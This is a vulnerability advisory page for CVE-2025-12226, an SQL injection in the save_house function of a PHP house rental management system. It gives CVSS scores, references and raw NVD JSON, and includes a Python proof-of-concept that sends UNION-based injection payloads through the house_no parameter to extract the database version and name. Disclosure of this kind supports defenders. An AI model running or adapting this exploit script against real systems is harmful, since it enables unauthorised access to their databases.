CVE-2025-12226

Description

A vulnerability was found in SourceCodester Best House Rental Management System 1.0. Impacted is the function save_house of the file /admin_class.php. Performing manipulation of the argument house_no results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:mayurik:best_house_rental_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Best House Rental Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12226 SQL Injection PoC
# Target: SourceCodester Best House Rental Management System 1.0
# Endpoint: /admin_class.php (save_house function)

TARGET_URL = "http://target.com/admin_class.php"

def exploit_sqli(house_no_payload):
    """Send malicious house_no parameter to trigger SQL injection"""
    data = {
        'save_house': '1',
        'house_no': house_no_payload,
        # Add other required parameters
        'price': '1000',
        'description': 'Test property'
    }
    try:
        response = requests.post(TARGET_URL, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

# Example: Extract database version using UNION-based injection
def extract_db_version():
    payload = "1' UNION SELECT NULL,version(),NULL,NULL,NULL---"
    result = exploit_sqli(payload)
    print(f"Database version extraction result: {result}")

# Example: Extract current database name
def extract_db_name():
    payload = "1' UNION SELECT NULL,database(),NULL,NULL,NULL---"
    result = exploit_sqli(payload)
    print(f"Database name extraction result: {result}")

if __name__ == "__main__":
    print("CVE-2025-12226 SQL Injection PoC")
    print("Target: Best House Rental Management System 1.0")
    extract_db_version()
    extract_db_name()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12226
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12226
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12226/
[4] VulDB https://vuldb.com/cve/CVE-2025-12226
[5] https://github.com/zhang947/vul/blob/main/report.md
[6] https://vuldb.com/?ctiid.329896
[7] https://vuldb.com/?id.329896
[8] https://vuldb.com/?submit.673611
[9] https://vuldb.com/?submit.674055
[10] https://vuldb.com/?submit.675883
[11] https://www.sourcecodester.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12226", "sourceIdentifier": "[email protected]", "published": "2025-10-27T05:15:38.590", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in SourceCodester Best House Rental Management System 1.0. Impacted is the function save_house of the file /admin_class.php. Performing manipulation of the argument house_no results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mayurik:best_house_rental_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A7D6CEC7-5EE1-4052-B0E2-093C40418760"}]}]}], "references": [{"url": "https://github.com/zhang947/vul/blob/main/report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329896", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329896", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673611", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674055", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://vuldb.com/?submit.675883", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}]}}